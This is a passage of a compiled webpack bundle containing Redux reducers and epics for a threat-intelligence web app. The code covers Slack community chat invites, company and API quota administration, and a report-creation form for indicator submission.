/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(706);



var debug = __WEBPACK_IMPORTED_MODULE_0_debug___default()('app:modules:chat:stores'); // eslint-disable-line no-unused-vars



// Slack Community Chat
var joinRequestInProgress = function joinRequestInProgress() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* JOIN_COMMUNITY_CHAT_CHANNEL */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* CHAT_INVITE_STATUS_UPDATE */]:
      return false;
    default:
      return state;
  }
};
var slackInvitationStatusInitialValue = { status: '', workspaceUrl: '' };
var slackInvitationStatus = function slackInvitationStatus() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : slackInvitationStatusInitialValue;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* CHAT_INVITE_STATUS_UPDATE */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* CLOSE_CHAT_MODAL */]:
      return slackInvitationStatusInitialValue;
    default:
      return state;
  }
};

var chatReducer = Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  joinRequestInProgress: joinRequestInProgress,
  slackInvitationStatus: slackInvitationStatus
});

/* harmony default export */ __webpack_exports__["a"] = (chatReducer);

/***/ }),
/* 2903 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(706);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__constants__ = __webpack_require__(1299);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };








var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:chat:epics'); // eslint-disable-line no-unused-vars

var joinSlackCommunityChatEpic = function joinSlackCommunityChatEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["c" /* JOIN_COMMUNITY_CHAT_CHANNEL */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')).mergeMap(function (resendInviteEmail) {
    return ajax.post('/services/slack/invite-user?resend=' + (resendInviteEmail ? 'true' : 'false')).map(function (_ref2) {
      var response = _ref2.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* CHAT_INVITE_STATUS_UPDATE */],
        payload: _extends({}, response, { resendAlreadyClicked: resendInviteEmail })
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* CHAT_INVITE_STATUS_UPDATE */],
        payload: { status: __WEBPACK_IMPORTED_MODULE_5__constants__["b" /* USER_STATUSES_FOR_SLACK_COMMUNITY */].ERROR }
      });
    });
  });
};

var launchSlackCommunityChatEpic = function launchSlackCommunityChatEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* CHAT_INVITE_STATUS_UPDATE */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')).filter(function (_ref3) {
    var status = _ref3.status;
    return status === __WEBPACK_IMPORTED_MODULE_5__constants__["b" /* USER_STATUSES_FOR_SLACK_COMMUNITY */].USER_ALREADY_EXISTS;
  }).do(function () {
    var win = window.open(__WEBPACK_IMPORTED_MODULE_5__constants__["a" /* SLACK_COMMUNITY_CHAT_WORKSPACE_URL */], '_blank');
    win.focus();
  }).ignoreElements();
}; // Don't worry about the result. Fire and forget

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(joinSlackCommunityChatEpic, launchSlackCommunityChatEpic));

/***/ }),
/* 2904 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export companies */
/* unused harmony export loading */
/* unused harmony export options */
/* unused harmony export fullyLoaded */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(707);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(252);





var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:companies:stores'); // eslint-disable-line no-unused-vars





var fromJSON = function fromJSON(rawCompany) {
  var parsed = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(rawCompany);
  return Object(__WEBPACK_IMPORTED_MODULE_4__types_js__["a" /* Company */])(parsed);
};

var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(list).toOrderedMap().mapKeys(function (k, v) {
    return v.get('guid');
  });
};

var companies = function companies() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUCCESS */]:
      {
        return listToOrderedMap(payload.map(fromJSON));
      }
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_SUCCESS */]:
      return state.delete(payload); // The ID to be deleted
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* SAVE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* DELETE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["r" /* SAVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* DELETE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* FETCH_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["n" /* SAVE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* DELETE_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_4__types_js__["c" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["s" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUCCESS */]:
      return state.merge(Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(action.meta));
    default:
      return state;
  }
};

/**
 * Whether any quotas are loading. We don't currently ever display more than one
 * at once so this single boolean will suffice to track this state.
 */
var loadingQuotas = function loadingQuotas() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_QUOTA */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["o" /* SAVE_QUOTA */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* RESET_QUOTA */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* FETCH_QUOTA_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* SAVE_QUOTA_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* RESET_QUOTA_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* FETCH_QUOTA_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["p" /* SAVE_QUOTA_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["k" /* RESET_QUOTA_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/**
 * Whether companies have been fully loaded. At times, the companies store will
 * hold shallow projections of companies (only guid + name) - so a new request
 * needs to be made in order to grab the entire objects.
 */
var fullyLoaded = function fullyLoaded() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_SUCCESS */]:
      var x = listToOrderedMap(payload.map(fromJSON));
      return x.filter(function (x) {
        return x.get('id') || x.get('primaryEmail');
      }).size != 0;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* FETCH_FAILURE */]:
      return true;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  companies: companies,
  loading: loading,
  options: options,
  loadingQuotas: loadingQuotas,
  fullyLoaded: fullyLoaded
}));

/***/ }),
/* 2905 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export ENDPOINT */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__getters__ = __webpack_require__(708);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__actions__ = __webpack_require__(1300);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__action_types_js__ = __webpack_require__(707);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__types_js__ = __webpack_require__(252);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }











var debug = __WEBPACK_IMPORTED_MODULE_8_debug___default()('app:modules:companies:epics'); // eslint-disable-line no-unused-vars





/**
 * NOTE: This is necessary because depending on whether or not a save came from
 * company creation or editing the payload will be immutable or a plain object.
 */
var getRateLimit = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["get"])('rateLimit'), Number, function (x) {
  return x ? x : undefined;
} // We allow rate limite to be undefined, for now. This particular case guards against NaN
);

var fromJSON = function fromJSON(company) {
  company = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(company);
  return company.mapEntries(function (_ref) {
    var _ref2 = _slicedToArray(_ref, 2),
        k = _ref2[0],
        v = _ref2[1];

    switch (k) {
      case 'enclaves':
        return [k, v.toMap().mapKeys(function (k1, v1) {
          return v1.get('id');
        })];
      default:
        return [k, v];
    }
  });
};

var toJSON = function toJSON(company, store) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(company).update('maxIngestEmailsCount', Number).update('enclaves', function (v) {
    return v ? v.map(__WEBPACK_IMPORTED_MODULE_10__types_js__["b" /* EnclavePermission */]).toSet() : [];
  }).update('sector', function (sector) {
    return store.getState().getIn(['sectors', 'sectors', Number(sector.get('value'))]);
  }).update('sharingGroups', function (groups) {
    return groups.map(function (group) {
      return { guid: group.guid };
    });
  }).toJS();
};

var ENDPOINT = '/services/companies';

var fetchEpic = function fetchEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["d" /* FETCH */]).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('payload')).debounceTime(500).switchMap(function (params) {
    var parameterizedUrl = ENDPOINT + '?' + parameterizeQueryString(params);
    return ajax.get(parameterizedUrl).map(function (_ref4) {
      var response = _ref4.response;

      var items = response.items,
          meta = _objectWithoutProperties(response, ['items']);

      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["i" /* FETCH_SUCCESS */],
        payload: items.map(fromJSON),
        meta: _extends({}, meta, {
          empty: !!response.empty,
          pageNumber: response.pageNumber || params.pageNumber,
          pageSize: response.pageSize || params.pageSize,
          hasNext: !!response.hasNext
        })
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["e" /* FETCH_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/**
 * NOTE: We're in an odd state here, because we want to allow admins to update
 * or set a rate limit when editing or creating a company, so the rate limit is
 * kept in the same state as all the other editable company data. However, the
 * rate limiting api is separate and requires a separate request. Therefore we
 * need to hold on to this rate limit value and pass it through so that another
 * epic can make use of it to handle the company rate limit request.
 */
var saveEpic = function saveEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["m" /* SAVE */]).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('payload')).map(function (x) {
    return toJSON(x, store);
  }).mergeMap(function (data) {
    var requestType = void 0;
    var companyGuid = data.guid;
    if (companyGuid) {
      requestType = ajax.putJSON(ENDPOINT + '/' + companyGuid, data);
    } else {
      requestType = ajax.postJSON(ENDPOINT, data);
    }
    return requestType.map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).map(fromJSON).map(function (payload) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["r" /* SAVE_SUCCESS */],
        payload: payload,
        meta: {
          alert: { type: 'success', text: 'Company saved.' },
          rateLimit: getRateLimit(data) // See NOTE
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["n" /* SAVE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not save company.' }
        }
      });
    });
  });
};

var deleteEpic = function deleteEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["a" /* DELETE */]).mergeMap(function (x) {
    return ajax.delete(ENDPOINT + '/' + String(x.payload)).map(function (_ref7) {
      var response = _ref7.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["c" /* DELETE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'Company removed.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["b" /* DELETE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not remove company.' }
        }
      });
    });
  });
};

/**
 * Array<Object> -> List<Quota>
 */
var toQuotaList = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"], Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["map"])(__WEBPACK_IMPORTED_MODULE_10__types_js__["d" /* Quota */]));

/**
 * Save (update or create) a company API request quota
 */
var saveQuotaEpic = function saveQuotaEpic(action$, store, _ref8) {
  var ajax = _ref8.ajax;

  // Requests to update a quota directly
  var updateQuota$ = action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["o" /* SAVE_QUOTA */]).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('payload')).map(function (payload) {
    return _extends({
      alert: { type: 'success', text: 'Quota updated successfully' } }, payload);
  });

  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].merge(updateQuota$
  // savedCompanyQuota$,
  ).mergeMap(function (_ref9) {
    var companyId = _ref9.companyId,
        counterId = _ref9.counterId,
        params = _ref9.params,
        alert = _ref9.alert;

    var isUpdate = !!counterId;
    var req$ = isUpdate ? ajax.putJSON(ENDPOINT + '/' + companyId + '/request-quotas/' + counterId, params) // Update
    : ajax.postJSON(ENDPOINT + '/' + companyId + '/request-quotas', params); // Create

    return req$.map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('response')).map(function (x) {
      return [x];
    }).map(toQuotaList).map(function (list) {
      return _defineProperty({}, companyId, list);
    }).map(function (quotas) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["q" /* SAVE_QUOTA_SUCCESS */],
        payload: quotas,
        meta: { alert: alert }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["p" /* SAVE_QUOTA_FAILURE */],
        error: true,
        payload: err,
        meta: { alert: alert }
      });
    });
  });
};

/**
 * Trigger a re-fetch of companies with the currently specified options. For
 * example, when a new company is saved rather than tack it on to state we need to
 * refetch. The reason is, all the logic related to sorting and filtering lives
 * on the server side, so we need to the server to provide us with an updated
 * list of companies based on our current criteria.
 */
var refetchEpic = function refetchEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["r" /* SAVE_SUCCESS */]).map(function () {
    return Object(__WEBPACK_IMPORTED_MODULE_6__getters__["displayOptions"])(store.getState());
  }).map(function (params) {
    var defaultParams = Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["getQueryParams"])(params);

    return _extends({}, defaultParams, {
      enclaveId: params.enclaveId
    });
  }).map(__WEBPACK_IMPORTED_MODULE_7__actions__["fetch"]);
};

/**
 * NOTE: There is no specific endpoint for this, so it needs to do the same
 * thing as the save action but only setting usedRequests to zero
 */
var resetQuotaEpic = function resetQuotaEpic(action$, store, _ref11) {
  var ajax = _ref11.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["j" /* RESET_QUOTA */]).map(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["prop"])('payload')).map(function (_ref12) {
    var companyId = _ref12.companyId,
        quotaId = _ref12.quotaId;
    return {
      type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["o" /* SAVE_QUOTA */],
      payload: {
        companyId: companyId,
        counterId: quotaId,
        params: {
          usedRequests: 0 // This is they key here. Setting used requests to zero
        }
      }
    };
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_5_redux_observable__["combineEpics"])(fetchEpic, refetchEpic, saveEpic, deleteEpic, saveQuotaEpic, resetQuotaEpic));
function parameterizeQueryString(params) {
  var sortBy = params.sortBy,
      sortOrder = params.sortOrder,
      otherParams = _objectWithoutProperties(params, ['sortBy', 'sortOrder']);

  var queryString = _extends({}, otherParams, {
    sort: sortBy && sortOrder ? sortBy + ',' + sortOrder : 'name,ASC'
  });
  return Object(__WEBPACK_IMPORTED_MODULE_4_querystring__["stringify"])(queryString);
}

/***/ }),
/* 2906 */,
/* 2907 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(204);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__utils__ = __webpack_require__(711);
function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }






var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:create:stores'); // eslint-disable-line no-unused-vars





// Store for the Create Report Form Content, legacy from the Forms Module
var form = function form() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_4__utils__["a" /* Form */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["LOAD_EXISTING_REPORT_CONTENT"]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])({ currentValues: payload.currentValues, enclaveToCopyTo: payload.enclaveToCopyTo }, __WEBPACK_IMPORTED_MODULE_4__utils__["c" /* toForm */]);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REGISTER_FORM"]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])({ currentValues: payload.values || Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])() }, __WEBPACK_IMPORTED_MODULE_4__utils__["c" /* toForm */]);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SET_FIELD_VALUE"]:
      var value = payload.value,
          keyPath = payload.keyPath;

      return state.setIn(['currentValues'].concat(_toConsumableArray(keyPath)), value);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UNREGISTER_FORM"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_REPORT_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_INDICATORS_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_REPORT_SUCCESS"]:
      return Object(__WEBPACK_IMPORTED_MODULE_4__utils__["a" /* Form */])();
    default:
      return state;
  }
};

/**
 * There is no initial stage, which means the splash page is where the user
 * should end up.
 */
var currentStage = function currentStage() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SET_STAGE"]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_REPORT_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_REPORT_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REGISTER_FORM"]:
      return 'setup';
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_INDICATORS_SUCCESS"]:
      return '';
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_INDICATORS_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_REPORT_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_REPORT_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE_SUCCESS"]:
      return 'review';
    default:
      return state;
  }
};

/**
 * Stores submission type for IOC submission: SPREADSHEET | FILE | TEXT
 */
var submissionType = function submissionType() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SET_SUBMISSION_TYPE"]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REGISTER_FORM"]:
      return '';
    default:
      return state;
  }
};

var applyRedaction = function applyRedaction() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["TOGGLE_REDACTION"]:
      return !state;
    default:
      return state;
  }
};

/* Loading state for the attach file dropzone */
var attachFileLoading = function attachFileLoading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_FILE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE"]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_FILE_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPLOAD_FILE_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPLOAD_FILE_FAILURE"]:
      return false;
    default:
      return state;
  }
};

/* Loading state for the report review stage */
var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REVIEW_REPORT"]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_REPORT"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_REPORT"]:
      return 'submission';
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REGISTER_FORM"]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UNREGISTER_FORM"]:
